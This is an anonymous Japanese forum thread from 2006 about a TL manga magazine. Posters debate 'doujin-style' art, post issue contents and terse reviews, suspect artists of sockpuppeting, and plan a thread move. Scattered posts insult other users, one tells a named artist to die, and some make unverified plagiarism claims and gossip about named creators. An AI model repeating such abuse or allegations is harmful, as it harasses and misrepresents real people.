152 :花と名無しさん:2006/10/28(土) 02:44:31 ID:???0
>>150
誰ならいいんだよw


153 :花と名無しさん:2006/10/28(土) 02:46:00 ID:???0
使って貰えない作家臭が拭えない
イパーンにとってはオバだろーがオタだろーが面白ければおk
それが全てだっつの

154 :花と名無しさん:2006/10/28(土) 02:52:49 ID:???0
なんだ、また石崎かw

155 :花と名無しさん:2006/10/28(土) 03:02:25 ID:???0
>>154
薬飲んだ?

156 :花と名無しさん:2006/10/28(土) 09:46:19 ID:???0
>>151
同意。
私も、このスレで「同人絵」って言われるまで
なんの違和感もなく読んでた。

どの作家が同人絵なのか詳しく教えてもらえるとありがたいかな。
要はりなちゃ系じゃないのが同人絵ってこと?

157 :花と名無しさん:2006/10/28(土) 09:55:24 ID:???0
皆、今月号読んでるの?
同人の話は食いつきがいいが…

158 :花と名無しさん:2006/10/28(土) 10:48:11 ID:???0
>>154
その人も同人出身じゃなかった?
…と言ってもその人の絵を見たこともないんだけど。

やっぱり載せてもらえない僻みで他の作家を
「同人絵」って叩いてるのかな


159 :花と名無しさん:2006/10/28(土) 12:10:25 ID:???0
>>158
病院逝け

160 :花と名無しさん:2006/10/28(土) 13:05:15 ID:???0
てか、159も無視しろよ
それに件の作家はもうやめたって話だから、もうスレ違い

161 :花と名無しさん:2006/10/28(土) 13:45:40 ID:???0
スルーすると>>154>>158みたいに自演で話題続けてるんだよ
それで他の人まで参加したりする
現れたらひたすらヴァカにするのがいいとオモ


162 :花と名無しさん:2006/10/28(土) 13:52:56 ID:???0
すでに>>160までそう見えるしな〜

163 :花と名無しさん:2006/10/28(土) 13:59:50 ID:???0
全部ひっくるめて無視すればいいと思う
からかう香具師も無視、叩き参加する香具師も無視
どっちにしろ、件の作家はもう恋パラには関係ないどころか
TLやめたんでそ?スレ違いじゃん

で、同人絵と商業絵の違いと
どうして同人絵が商業誌に載ってはいけない理由を教えて欲しかったり?


164 :花と名無しさん:2006/10/28(土) 14:56:55 ID:???0
TLやめたっていうのもソースないよ
アンチが最初に言い出したことだから

165 :花と名無しさん:2006/10/28(土) 15:09:33 ID:???0
同人ネタもういいよ
TLって作家がほとんど同人やってるせいだろうけど
食いつき杉
アンチにしろマンセーにしろ他スレと温度差感じる…
名前あげられた作家なのかと勘ぐりたくなる

166 :花と名無しさん:2006/10/28(土) 16:08:00 ID:???0
同人や作家ネタはどうでもいいんだけど
同人絵ってのがどういうものなのか、それだけ知りたいよ
自分違いが本当にわからない…
それから、どうして同人絵がだめなのかも

それとも同人絵は駄目だけど、ヲヴァ絵はイイ!っていう
感じなんだろうか

167 :花と名無しさん:2006/10/28(土) 16:12:49 ID:???0
りなちゃ系じゃない絵=同人絵
と考えれば一つの目安になるんじゃないかと

168 :花と名無しさん:2006/10/28(土) 16:17:11 ID:???0
なるほど


169 :花と名無しさん:2006/10/28(土) 16:25:19 ID:???0
作家スレに自分は同人っぽい絵で〜って書いてる人いるから、そういう認識は存在するんだとオモ
あれが恋パラ作家だったらこの話題に絶対食いついてるはずw


170 :花と名無しさん:2006/10/28(土) 16:29:16 ID:???0
作家を挙げてみて判断すると判りやすいのかもね

171 :花と名無しさん:2006/10/28(土) 17:56:10 ID:???0
つまり、りなちゃ系の絵じゃなきゃ駄目って事か…>同人絵NG

172 :花と名無しさん:2006/10/28(土) 18:05:41 ID:???0
我らが菜摘タンはりなちゃ系?

173 :花と名無しさん:2006/10/28(土) 20:10:20 ID:R3+tsW4/0
風呂散発

174 :花と名無しさん:2006/10/29(日) 00:03:11 ID:???0
同人絵(白癬系ヲタ絵?)の対義語として
ヲヴァかりなちゃっていうのが極端なきがす
TLの対象年齢とジャンルのテーマからいって
りなちゃよりも年齢が上のマーガコミクスフレンドデザ系の
少女漫画絵じゃまいか?
そこらへんの雑誌から都落ちしてきた作家は同人スカウト作家と
絵が違うってなんとなく感じる・・

175 :花と名無しさん:2006/10/29(日) 00:18:29 ID:???0
同人絵イラネってのがよく判らんのだが
文句言った人が同人絵が嫌いだって言うなら判る

そして、その同人絵ってのは良く判らない
センスない絵って事なら、恋パラってそこまでセンスのいい作家
いない気がするけど

176 :花と名無しさん:2006/10/29(日) 03:22:32 ID:???0
同人絵ってのが自分もよくわからん。
同人=二次創作=少年漫画の影響=非少女漫画絵
ってことなのかな。

177 :花と名無しさん:2006/10/29(日) 03:24:29 ID:???0
同人絵がわかるサイドが実際のいろんな絵のサンプルを何枚も
わからない人側に見せながら
これは同人絵これは違うって出来たらいいんだけどwww

178 :176:2006/10/29(日) 03:28:53 ID:???0
かろうじて判別つくのは
「木村ぶんぶんは同人絵じゃないだろう」ってことくらい。
ぶんぶんが同人絵に含まれるんなら、もう私にはわからん。


179 :花と名無しさん:2006/10/29(日) 03:32:21 ID:???0
「ロミオとジュリエット」ネタのやつは同人絵だよね。
がゆんの影響を色濃く受けてそうだし。

180 :花と名無しさん:2006/10/29(日) 04:34:26 ID:???0
かわいけりゃいいジャマイカ
別に同人絵を駄目とも、リナチャ系を偉いとも思わない

181 :花と名無し:2006/10/29(日) 10:25:45 ID:???0
同人絵が嫌いって人の発言が
ただの僻みとか恨みっぽくにしか聞こえないのは気のせいか?

なんか、そんなに嫌いなら
漫画読まなきゃいいじゃん。って思う。


182 :花と名無しさん:2006/10/29(日) 10:38:44 ID:???0
139 :花と名無しさん :2006/10/27(金) 23:43:20 ID:???0
今月号漫画スクールBクラス作品集みたいだったw
話は悪くないけど絵が…。同人スカウトもいいけど商業誌で描くなら
同人絵は直してきて欲しい
5人くらい同人絵が続いてウヘァ('A`)ってなった

142 :花と名無しさん :2006/10/28(土) 01:08:09 ID:???0
少女漫画じゃなくてアニメや少年漫画を模写して出来上がったような絵柄かな
今月号だとコダマナオコ、史槻ワタル、菜月美亜、橘えりざあたりが同人絵に見える
本スレでもネタになってたがミニスカ制服にニーソックス合わせるのに抵抗なさそう

145 :花と名無しさん :2006/10/28(土) 01:52:59 ID:???0
同人絵と少女漫画絵の違いがうまく説明出来ない
つか144みたいにその違いがわからないほど同人感覚が
浸透してる人にはなおさら…
少なくとも主要イパーン誌に上で挙がったような絵の人はいないよ
穴埋め新人とかは知らんが
---------------------------------------------------------------------
…同人出身を嫌ってる作家って感じがする
もしくは漫画家を目指していたが、スカウトもなくデビューも出来なかった

183 :花と名無しさん:2006/10/29(日) 13:39:13 ID:???0
>>179
ただのゲーム絵じゃね?

184 :花と名無しさん:2006/10/29(日) 13:46:00 ID:???0
このスレは作家のもの?
いい加減に作家スレか同人板でやってくれ
羅列や感想はほとんどないのに同人が絡んだ話になると
今月号読んだと思しきレスのオンパレード
同人嫌いって言ってるヤシもそれに噛み付くヤシも見本誌持ってる作家でしょ
もう勘弁して欲しい

185 :花と名無しさん:2006/10/29(日) 16:46:58 ID:???0
>>184
流れ変えたいんなら、なんかの話振ればいいのに…
184こそ件の同人の話題を出した人に見えるよ

186 :花と名無しさん:2006/10/29(日) 19:20:00 ID:???0
別に作家のものになってるとも思わないが…
作家が居てたとしても普通に読めるレスだけどな

187 :花と名無しさん:2006/10/29(日) 21:16:36 ID:???0
作家が多いのは今に始まったことじゃないし
どうでもいいプライドかけて叩き合ってるのをヲチしてるのは
本人達が描いてる漫画より面白いよ
誰なのか特定するまでやってくれw

188 :花と名無しさん:2006/10/29(日) 21:34:00 ID:???0
そこで、石崎タンですよw

もう同人絵論争はいいんじゃない?
そういう絵が好きな人も、嫌いな人もいるって事で。

189 :花と名無しさん:2006/10/29(日) 21:54:19 ID:???0
もうそれでいいよ…

190 :花と名無しさん:2006/10/30(月) 20:51:01 ID:???0
荒しや論争は本人認定された途端収まるっていうのを思い出した
全員とは言わないけど>184に該当する人がいたんだろうな

191 :花と名無しさん:2006/10/30(月) 21:15:57 ID:???0
せっかく189で話が終わってるのに、わざわざ蒸し返すなよ
犯人探しはもういらない

192 :花と名無しさん:2006/10/30(月) 21:45:55 ID:???0
>>188
病院行け基地外

193 :花と名無しさん:2006/10/30(月) 22:49:51 ID:???0
蒸し返すな

194 :花と名無しさん:2006/10/31(火) 03:19:06 ID:???0
同人絵が嫌いって人の発言が
ただの僻みとか恨みっぽくにしか聞こえないのは気のせいか?

なんか、そんなに嫌いなら
漫画読まなきゃいいじゃん。って思う。

195 :花と名無しさん:2006/10/31(火) 06:34:40 ID:???0
>>194
そんなにイヤなら漫画読まなきゃいい、じゃなくて
そんなにイヤなら漫画描かなきゃいい、だったりしてw

196 :花と名無しさん:2006/10/31(火) 08:57:46 ID:???0
>>195
ワロタwww

197 :花と名無しさん:2006/10/31(火) 12:53:03 ID:???0
88 名前:花と名無しさん メェル:sage 投稿日:2006/10/29(日) 21:34:00 ID:???0
そこで、石崎タンですよw

もう同人絵論争はいいんじゃない?
そういう絵が好きな人も、嫌いな人もいるって事で。

189 名前:花と名無しさん メェル:sage 投稿日:2006/10/29(日) 21:54:19 ID:???0
もうそれでいいよ…

198 :花と名無しさん:2006/10/31(火) 15:31:55 ID:???0
石崎粘着は病院行くなり薬飲むなりしろよ
石崎の絵すら見たことないけど石崎が気の毒だ

199 :花と名無しさん:2006/10/31(火) 15:56:59 ID:???0
198といい、叩きも巧妙化してきたねえ…

200 :花と名無しさん:2006/10/31(火) 20:53:35 ID:???0
私も一年くらい買ってるけど、見たことない…
余程記憶に残らないのか、目が拒絶してるのか

201 :花と名無しさん:2006/10/31(火) 22:27:44 ID:???0
実際その程度の作家だと思うよ
ただアンチがしつこいから、うざいだけ。

202 :花と名無しさん:2006/11/01(水) 02:44:46 ID:???0
ほんとに巧妙になったね
こういう自演を
信じると思ってんのかね

203 :花と名無しさん:2006/11/01(水) 11:17:21 ID:???0
「愛と罪の狂想曲」 夏生恒
「悪戯なHONEY」 夕希はづみ
「姉弟のカンケイ」 百瀬なつ
「愛しのブレーメンズ★」 菜摘ちはる
「ラブゲーマー」 久保田美穂
「デブっちゃいやん」 史槻ワタル
「正しい駄犬のしつけ方」 コダマナオコ
「神様のおもうまま」 高橋依摘
「ゆううつジュリエット」 橘えりざ
「楽に生きや、楽しく生きや。」ふを留美&芳晶せいじ
「トップ ノート」 木村ぶんぶん
「恋の魔法使い」 菜月美亜
「彼氏未満」 ハザマ涼
「あなたがほしいのっ!」 葵ひなり
「やさしい怪獣」 晴美はるらん

204 :花と名無しさん:2006/11/01(水) 13:02:57 ID:???0
もう全員作家ってことで必ずレスの前に
「作家だけど…」って入れればいいんじゃまいか

「作家だけど羅列いきます☆」とかw

205 :花と名無しさん:2006/11/01(水) 16:28:03 ID:???0
全員作家なら入れる必要ないんじゃ・・・

206 :花と名無しさん:2006/11/01(水) 16:42:16 ID:???0
げらげら

207 :花と名無しさん:2006/11/01(水) 21:35:51 ID:???0
作家だけどマンセー意見しか欲しくありません

208 :花と名無しさん:2006/11/01(水) 21:58:09 ID:???0
じゃあペンネーム名乗って光臨してくれ、マジで。

209 :花と名無しさん:2006/11/01(水) 22:02:31 ID:???0
夕希はづみだがアンケートよろw
















とか、なりすまし放題になるだけなんじゃない?

210 :花と名無しさん:2006/11/01(水) 22:12:09 ID:???0
それでもいいや、面白ければ

211 :花と名無しさん:2006/11/01(水) 22:24:36 ID:???0
もういっそ作家しか書いてはいけないスレに…

212 :花と名無しさん:2006/11/04(土) 02:45:44 ID:???0
もうなってるんじゃね?

213 :花と名無しさん:2006/11/04(土) 05:25:41 ID:???0
>>212
じゃあ、おまいは作家ってことなんだな?

作家乙

214 :花と名無しさん:2006/11/04(土) 05:59:59 ID:???0
>>213
それおかしくない?
作家じゃないからそう疑ってるんじゃないの?

215 :花と名無しさん:2006/11/04(土) 09:25:09 ID:???0
自分が作家でも、他のカキコが作家かどうかは疑うんじゃない?

216 :花と名無しさん:2006/11/04(土) 10:33:55 ID:???0
お前ら作家だな





俺も作家(´ー`)ノシ

217 :花と名無しさん:2006/11/04(土) 11:42:54 ID:???0
おっす!オラ作家!
みんなも作家で嬉しいよ!

218 :花と名無しさん:2006/11/04(土) 11:53:39 ID:???0
;`;:゛;`(;゜;ж;゜; )ブフォ

219 :花と名無しさん:2006/11/06(月) 08:52:01 ID:???0
てゆうかやっぱそうなったところでかわんないよなw

毎回書き込むたびに絶対作家個別の本人しか知らないことでも証拠に書かない限り
なりきり出来るし・・・

220 :花と名無しさん:2006/11/06(月) 09:05:20 ID:???0
>>219
昨日、机の引き出しの裏にはさまっていた昔の写真をみつけて
すっかり懐かしくなって小学生のときの友人にメールをしようと思ったら
アドレスが変わっていてがっかり、ちょっと凹んでしまった天野ちぎりです。









なーんて、本人しかわからん情報を出されても
それが本人のマジネタなのか、捏造なりきりネタなのか
本人以外わからんのなら判別しようがない罠。

221 :花と名無しさん:2006/11/06(月) 09:18:53 ID:???0
後から照合出来る原稿ネタとかでそれを書いとくんだお

222 :花と名無しさん:2006/11/06(月) 09:20:18 ID:???0
>>220
そーゆーのじゃないとおも

223 :花と名無しさん:2006/11/06(月) 09:25:11 ID:???0
>>221
レス書き込むたびに(レスごとに)照会ネタを盛り込むのも面倒な話だなあ。
せめてIDが出る板なら最初になんか書いておいたら後は話題へのレスだけですむが。

224 :花と名無しさん:2006/11/06(月) 15:23:03 ID:???0
じゃあ次にスレ立てする時にレンパラと関係ありそうな、強制IDの板にお引越しすればいいよ
そこで成りきりでも降臨でもすればいい
今のところ思いつくのは同人板とエロマンガ板くらいだけど


225 :花と名無しさん:2006/11/06(月) 15:29:30 ID:???0
なんか偉そうなり

226 :花と名無しさん:2006/11/06(月) 15:36:39 ID:???0
>224以外は冗談で言ってるんじゃないのか?

227 :花と名無しさん:2006/11/06(月) 16:56:08 ID:???0
もう、この辺でいいんでないかと

真剣に誰のナリキリにするか考えちゃったジャマイカww

228 :花と名無しさん:2006/11/06(月) 21:39:56 ID:???0
やっぱ巻頭人気作家系はナリキリの候補も多いのかな

229 :花と名無しさん:2006/11/06(月) 23:56:47 ID:???0
嫌われてる作家の方がナリキリ多そうだけど

230 :花と名無しさん:2006/11/07(火) 00:33:06 ID:???0
凄いことハケーンした

天野、アサオカ、あやさか
「あ」で始まる作家は体調不良になるwww

231 :花と名無しさん:2006/11/07(火) 00:54:33 ID:???0
あ、って縁起悪いのかねえ

232 :花と名無しさん:2006/11/07(火) 01:06:10 ID:???0
改名しようかな…

233 :花と名無しさん:2006/11/07(火) 01:20:45 ID:???0
あ行の人は、沢山の人に愛されるんだよ
女優さんなど名前に「あ」や母音が「あ」をつけるらしいよ
反対に「い」や母音が「い」の人は幸が薄い運命らしく忌み嫌われたりする

マジレス

234 :花と名無しさん:2006/11/07(火) 10:14:31 ID:???0
それは当たってないな
なぜなら漏れの名前は母音が「あ」だが…orz

235 :花と名無しさん:2006/11/07(火) 10:29:16 ID:???0
忌み嫌われるという「い」のつく漫画家

いがらしゆみこ…ああ、忌み嫌われてるなあ
石坂啓…ああ、忌み嫌われてるなあ
一条ゆかり…ああ(以下略


236 :花と名無しさん:2006/11/07(火) 11:17:55 ID:???0
忌み嫌われるという「い」のつく漫画家
いしざ(ry


237 :花と名無しさん:2006/11/07(火) 12:49:44 ID:???O
ちょっ…死体に鞭打ちWW

238 :花と名無しさん:2006/11/07(火) 12:58:02 ID:???0
大文字!?

239 :花と名無しさん:2006/11/07(火) 13:21:52 ID:???0
大文字!?

240 :花と名無しさん:2006/11/07(火) 14:28:54 ID:???0
そしてまた死体に鞭打ちww

241 :花と名無しさん:2006/11/07(火) 15:02:41 ID:???0
粘着基地外は病院に行け

242 :花と名無しさん:2006/11/07(火) 15:36:20 ID:???0
矢沢あい、安野モヨコ>あ

243 :花と名無しさん:2006/11/07(火) 17:21:50 ID:???0
日本の漫画家一覧でも見てくるか…

244 :花と名無しさん:2006/11/08(水) 18:58:17 ID:???0
次スレから同人板かエロマンガ板に引っ越すのは賛成
ID出た方がいい

245 :花と名無しさん:2006/11/08(水) 20:51:56 ID:???0
同人板はまた同人ネタばっかりになるから嫌だ
閑古スレでも滅多な事じゃ落ちないエロ漫画板キボン

246 :花と名無しさん:2006/11/08(水) 21:36:48 ID:???0
本スレにおいでよー

247 :花と名無しさん:2006/11/08(水) 22:36:55 ID:???0
基地外も一緒だお?

248 :花と名無しさん:2006/11/08(水) 23:15:28 ID:???0
本スレ住人は耐性ありますから!

249 :花と名無しさん:2006/11/08(水) 23:32:26 ID:???0
ねえよ。飽き飽きしてんだよ。

250 :花と名無しさん:2006/11/09(木) 00:29:19 ID:???0
本人がいなくなっても基地外は残ってんだよ…
ID出るところなら、ある程度は何とかなるもんだ

251 :花と名無しさん:2006/11/09(木) 08:49:06 ID:???0
ID出ても荒れるとこは荒れるよ

252 :花と名無しさん:2006/11/09(木) 10:21:50 ID:???0
うん

253 :花と名無しさん:2006/11/09(木) 11:31:21 ID:???0
同人の突っ込んだ話は同人板にスレ立ててやって欲しいと思う
ラレッツとかは本スレで出来れば一番いいんだがナー

254 :花と名無しさん:2006/11/09(木) 11:51:59 ID:???0
本スレ嫌だ

255 :花と名無しさん:2006/11/09(木) 20:09:14 ID:???0
今の本スレみて、耐性とても思えない

256 :花と名無しさん:2006/11/09(木) 20:37:19 ID:???0
あれは正しい祭りの姿ジャマイカw

257 :花と名無しさん:2006/11/19(日) 01:16:06 ID:???O
縄に修正入ってる…
修正入れるくらいならネーム段階で却下すりゃいいのに……(´・ω・`)

258 :花と名無しさん :2006/11/19(日) 01:36:27 ID:???0
最後に載ってる高橋ってひと葉月の影響受けてるっぽ・・

259 :花と名無しさん:2006/11/19(日) 13:57:32 ID:???0
>>258
そうかな〜?
ただ絵を若めにしようとして、失敗したってだけに見える

260 :花と名無しさん :2006/11/19(日) 15:04:49 ID:???0
>>258
ずいぶんまえにも劣化葉月とかいわれてたよね

261 :花と名無しさん:2006/11/19(日) 15:29:53 ID:???0
二人共、線がガサガサしてるから同じカテゴリーに属する絵だろうけど
パクったり影響うけたりしてるとは思えないんだが…

262 :花と名無しさん:2006/11/19(日) 15:35:29 ID:???0
本家を冷遇の末に追い出して、劣化を使う意味が分からんのだが…
次号予告も、佐藤雪やあやさかが文字だけで
他の穴埋め系作家がイラストつきってのもわからん…w

ぱらぱらと虫食いの様に読んだ、CMページが多すぎてうんざりした
買ったらまず次号予告見る自分は、何を期待しているのか…



263 :花と名無しさん:2006/11/19(日) 15:47:42 ID:???0
>本家を冷遇の末に追い出して
これってソースは本人の日記だけでそ?
片方のみの言い分が真実とは限らないし
当時の葉月作品のクオリティから考えても
恋パラでの扱いって妥当だったとオモ

264 :花と名無しさん:2006/11/19(日) 16:05:33 ID:???0
イラスト入りの広告は人気のバロメーターだから
2ch以外の一般には人気があるんだろう
何度落としても、途中掲載でも
人気があれば天野やあやさかの例があるように、冷遇はされない
人気が無かったら石崎のように切られる、それだけ。」

葉月は掲載雑誌のカラーが合わなかっただけだと思う

265 :花と名無しさん :2006/11/19(日) 16:11:25 ID:???0
たしかに葉月の漫画みてると恋パラでは合わないな・・・
今月の巻頭とか見てるとそうおもう

266 :花と名無しさん:2006/11/19(日) 20:54:22 ID:???0
>>264
入院しろキチガイ

267 :花と名無しさん:2006/11/19(日) 21:02:53 ID:???0
>>266
自演乙!

268 :花と名無しさん:2006/11/19(日) 22:56:28 ID:???0
いつもレスしてるもんな、堪え性がない香具師w



269 :花と名無しさん:2006/11/19(日) 22:57:59 ID:???0
「聖なる夜に魔法をかけて…」 三浦ひらく
「ミリオンキス・ベイビー」 相田早智子
「ぴんぽん」 花田朔生
「続・悪戯(いたずら)なHONEY」 夕希はづみ
「Passion」 木村ぶんぶん
「meet your X'mas」 明野織枝
「愛しのブレーメンズ★」 菜摘ちはる
「嵐の中で…。」 悠木りおん
「プリンセスの秘かな目論見」 霧野むや子
「蝶になりたい!」 山崎乃亜
「愛と罪の狂想曲(カプリッチオ)」 夏生恒
「ヒーローじゃなくても」 佐木田すい
「ゴールデン・ラヴァーズ」 天野ちぎり
「美味しい関係」 晴美はるらん
「1st.Kiss」 高橋依摘


270 :花と名無しさん:2006/11/20(月) 11:46:31 ID:???0
絵は嫌いだけど、山崎乃亜が一番良かった
後はもういつも通りって感じ、良くも悪くも
花田朔生夕希はづみ明野織枝霧野むや子夏生恒佐木田すい
絵が古すぎて読めない…ありえない、表紙だけでスルー…
大人っぽい絵は好きだけど、古い絵は嫌い

なんだかどんどん面白くなくなっていってるんだけど…
ずっと買ってたから残念

271 :花と名無しさん:2006/11/20(月) 19:53:25 ID:???0
http://comic6.2ch.net/test/read.cgi/gcomic/1161268263/636-
636 :花と名無しさん :2006/11/20(月) 18:32:52 ID:???0
微妙にスレチだけど、恥子のBL単行本で構図パクリを2つ発見してしまった。
同じ作家から。
しかも元いた出版社の冬水の人から。

641 :花と名無しさん :2006/11/20(月) 19:15:24 ID:???0
一応パクリのタイトルとページだけ書いておく。
パクラレ、あべ美幸「困った時には星に聞け!」3,5巻
パクリ、恥子りんごとケダモノ

272 :花と名無しさん:2006/11/21(火) 18:07:31 ID:???0
なつみタンに触れてはいけないだろうか…
あれはギャグだよな…?

273 :花と名無しさん:2006/11/21(火) 22:03:44 ID:???0
>>272
ギャグとしか思えないけど、寒かった…誰か魅力を教えて欲しいぉ


274 :花と名無しさん:2006/11/21(火) 22:15:18 ID:???0
>272
文字通り触れたくないからスルーした
なつみタンとあいのタン、セットで番外地に引越してほしい

275 :花と名無しさん:2006/11/21(火) 22:24:32 ID:???0
無理やり良かった探しをしなければいけないような
今月号でした…

三浦ひらく…花咲との見分けが付かない
相田早智子…なんか目が気持ち悪い、こんなパティシィエあり得ない
花田朔生…絵が嫌いなのでスルー
夕希はづみ…パラ見、エロシーンどこかで見たような
木村ぶんぶん…ほのぼの
明野織枝…絵が古すぎ!スルー
菜摘ちはる…なにがなんだか…エロシーンが笑えるとは一体…
悠木りおん…普通、本当に普通
霧野むや子…「久々登場」のコピーに笑った、絵はオタで古い
山崎乃亜…普通に良かった、惜しいのは絵が…
夏生恒…デフォルトでスルー作家
佐木田すい…デフォルトでスルー作家
天野ちぎり…なんだか…テンプレの昼メロみたいだ
晴美はるらん…普通すぎて地味
高橋依摘…コメディなのか?寒いし無理やりエロつけただのような…


276 :花と名無しさん:2006/11/21(火) 22:44:32 ID:???0
恥子はペット飼う資格無し
誌ね

277 :花と名無しさん:2006/11/21(火) 23:31:02 ID:???0
>>274
あいのたんは来月コミクスらしいよ(本の新刊予定予定一覧で見た)
っつー事は、ある程度人気はあるんだろうから
このままいるんじゃないの?

278 :花と名無しさん:2006/11/22(水) 03:03:57 ID:???0
あいのタンと伊吹なんとかがコミクスみたいだね
伊吹は上手いしわかるけど、あいのタンはなあ・・
だれが買うんだろう

279 :花と名無しさん:2006/11/22(水) 13:35:34 ID:???0
初コミクスが売れなかったら次は無い、っていろんな漫画家の日記で見るから
それなりに売れてるのじゃないだろうか…
これ作家スレからの抜粋
「(略)TLはもう頭打ち。これ以上ジャンルとして飛躍的に伸びることはない。
それに巻頭やカラー、コミクス化は、大手誌やBLで過去にコミクス出してるようなキャリアのある人に
優先的にまわす(略)」って感じみたいだし

280 :花と名無しさん:2006/11/22(水) 14:30:08 ID:???0
あいのたんは営業がすごいって聞いた。
どんな急な依頼でも受けるらしい。
そこんとこはえらいんじゃない?

281 :花と名無しさん:2006/11/22(水) 21:44:30 ID:???0
よくわからんが、コミクスが出るって事は人気があるって事だと思う
自分は範疇外なので魅力は語れない、スマソ

282 :花と名無しさん:2006/11/24(金) 00:31:55 ID:???0
来月のメンバー、なんかしょぼくないか?
冬コミが関係してるのかな

283 :花と名無しさん:2006/11/24(金) 01:00:00 ID:???0
あんなもんじゃね?別にしょぼいとは思わなかったけど

284 :花と名無しさん:2006/11/24(金) 01:06:41 ID:???0
恋パラでは穴埋め扱いだった赤村に
カラーが付いてよかったな〜、と…。

285 :花と名無しさん:2006/11/24(金) 16:39:55 ID:???0
赤村は恋パラからsweetに移っていい扱いだったから恋パラでも評価変えたってことかな
とりあえず穴埋め脱出おめw
ぶんぶんあたりも別雑誌で描いて箔をつけた方がいいんじゃないかな
今のままだとずっと穴埋めレギュラーでコミクスも一生出なそう・・・

286 :花と名無しさん:2006/11/24(金) 16:59:09 ID:???0
恋パラにコミクスの期待するだけ無駄だと思う

287 :花と名無しさん:2006/11/24(金) 18:45:08 ID:???0
赤村穴埋めレベルだと思うんだけどね
陳腐な話に絵もキモい
ぶんぶんは好きだけどどこか他で描いて箔がつくとかない気がする
どこいってもまったり係になりそう

288 :花と名無しさん:2006/11/24(金) 20:24:19 ID:???0
…と穴埋めにもなれない作家さんが申しておりますw

恋パラってコミクスになる作家がもう決まってるからなー
ぶんぶんあたりは厳しい感じもするぉ

289 :花と名無しさん:2006/11/24(金) 20:53:50 ID:???0
> …と穴埋めにもなれない作家さんが申しておりますw
と赤村が…(ry

290 :花と名無しさん:2006/11/25(土) 00:40:58 ID:???0
って応酬も飽きたw

赤村はミクシーで「恋パラはセーラー服が描けない」ってやったら
愚痴っていたな、本人も不満ありありみたいだよ

291 :花と名無しさん:2006/11/25(土) 01:06:47 ID:???0
別にいらないからsweetにいっていいよ

292 :花と名無しさん:2006/11/25(土) 01:47:39 ID:???0
パクラーよりかは全然いいよ

293 :花と名無しさん:2006/11/25(土) 02:05:45 ID:???0
どっちもイラネ

294 :花と名無しさん:2006/11/25(土) 02:59:09 ID:???0
じゃあ誰がいるのw?

295 :花と名無しさん:2006/11/25(土) 03:46:32 ID:???0
赤村か恥子か知らないけど
必死なのが一人いるね

296 :花と名無しさん:2006/11/25(土) 10:15:32 ID:???0
>>290
そうなの?
赤村好きなんだけど、自分が了承して引き受けておいて
相手が特定出来る愚痴をネットに書くのってモニョ行為だと思うので
ちょっとがっかり…

297 :花と名無しさん:2006/11/25(土) 16:30:37 ID:???0
話の内容全部とか担当相手の愚痴ならそうだけど
セーラー服描けないって愚痴くらいモニョるほどじゃないんじゃ?

298 :花と名無しさん:2006/11/25(土) 16:57:09 ID:???0
エロありだからこそ?ちょこまかした自主規制みたいの
あるっぽいしね…
よそだけど変形セーラーみたいなんだたらオッケーなのとか
あったけどそれじゃだめなのかねw

299 :花と名無しさん:2006/11/25(土) 17:01:56 ID:???O
ってか、セーラー服描けなくなったのって石崎の件ででそ?
赤村は石崎にお前のせいだ!って文句言ってる訳じゃんwガチバトルすかw

300 :花と名無しさん:2006/11/25(土) 17:39:24 ID:???0
エロはありでも制服着てたらお酒NGとかあるしな〜…

301 :花と名無しさん:2006/11/25(土) 18:07:38 ID:???0
少年誌のビーチク描写だってジャソプやマガジソはNGだけどサソデーは桶なように
雑誌によって基準が違うのは当然でそ
セーラー服が描きたいならそれが桶な雑誌にだけ描けばいいんじゃね?
もちろん雑誌を選べる立場であることが前提だが


302 :花と名無しさん:2006/11/25(土) 18:25:21 ID:???0
変形セーラーてどんなの?

303 :花と名無しさん:2006/11/25(土) 18:47:23 ID:???0
ジャンプでもコミクスで乳首描き足しはあるけどねw

304 :花と名無しさん:2006/11/25(土) 18:53:52 ID:???0
グレイトはこの前マガジンで色付き乳首描いてたよ
規制が緩くなってんのかとオモた

305 :花と名無しさん:2006/11/25(土) 18:56:31 ID:???0
乳首券w

306 :花と名無しさん:2006/11/26(日) 00:40:28 ID:???0
前に本スレで竹作家でミクシやってるヤシ晒されてた時
菜摘とはるらんくらいだっけどキーワードに雑誌名入れてないだけで
本当はもっとたくさんいるのかも。
恥子もミクシやってるって日記に書いてたし。

307 :花と名無しさん:2006/11/26(日) 08:41:54 ID:???0
あぼーん

308 :花と名無しさん:2006/11/26(日) 12:33:09 ID:???0
ってか、ミクシに本名やペンネームで登録していたり
キーワードに素性の分かるものを入れてたりするのって、大御所か
自意識過剰のアホくらいなもんだが…

エロ系やマイナー系の作家はかなり多いよ、ミクシ

309 :花と名無しさん:2006/11/26(日) 13:27:05 ID:???0
本名登録はアフォだがPNは普通じゃね?
だったらHPでPNや掲載誌、コミクスタイトル書くのも駄目ってことになる
ミクシを内輪の場と考える方が危険だろう


310 :花と名無しさん:2006/11/28(火) 19:29:26 ID:???0
へー

311 :花と名無しさん:2006/11/29(水) 15:25:31 ID:???0
●TL新スレについて●
荒らし自演粘着などの横行にて、スレでのレスが出来ない状態です
そこでそれをより少なくしてジャンルの話をするにはどうした方がいいか
話し合いをTL避難所の本スレ避難所にて行います
この話し合いの結論が出るまで、新スレの製作は控えてください

TL本スレ避難所
http://jbbs.livedoor.jp/bbs/read.cgi/comic/1477/1090155738/

312 :花と名無しさん:2006/11/29(水) 15:59:38 ID:???0
こっちも次スレの場所について考えた方がいいかもね
あと作家降臨と同人話はOKかNGか

313 :花と名無しさん:2006/11/29(水) 16:19:46 ID:???0
どっちもNG…ってか、同人話を前提で話をされても
全然わかんないし…作家はなんか邪魔
ロムっててもいいから、訳知り顔で口挟むなって思う

314 :花と名無しさん:2006/11/30(木) 01:24:58 ID:???0
避難所行きになった途端カキコ激減…
あそこは管理人さんにホストやIP丸分かりだから
レスしたがらないヤシが多いのか…w

315 :花と名無しさん:2006/11/30(木) 01:44:50 ID:???0
自分はしたけど後が続かないから、どうしようもない…

316 :花と名無しさん:2006/11/30(木) 06:30:44 ID:???0
ていうか今はテンプラ出てて解決策を話合うって状態なんだから
そんなにもう条件ないべ?

317 :花と名無しさん:2006/11/30(木) 23:20:51 ID:???0
【次スレに相応しいと思える板は?またその理由も】
少女漫画板。
少女漫画エロだから。
今まで少女漫画板にあったから。
ID表示はこのスレの嵐の歯止めにはならないと思うから。
PINK板に行っても嵐はなくならないと思うから。
スレをあちこち移動させると過疎ると思うから。
PINK板の新しい粘着が嵐を起こすと思うから。

【作家とわかる発言は是か非か。その理由も】
非。
読者が何も言えなくなってしまうから。
推測だが、スレを荒らしてるのは作家だから。
(そうでない作家がほとんどだと思うが。)
作家の事情話になると漫画の話が出なくなるから。
作家や出版社の事情は作品には関係のないことで
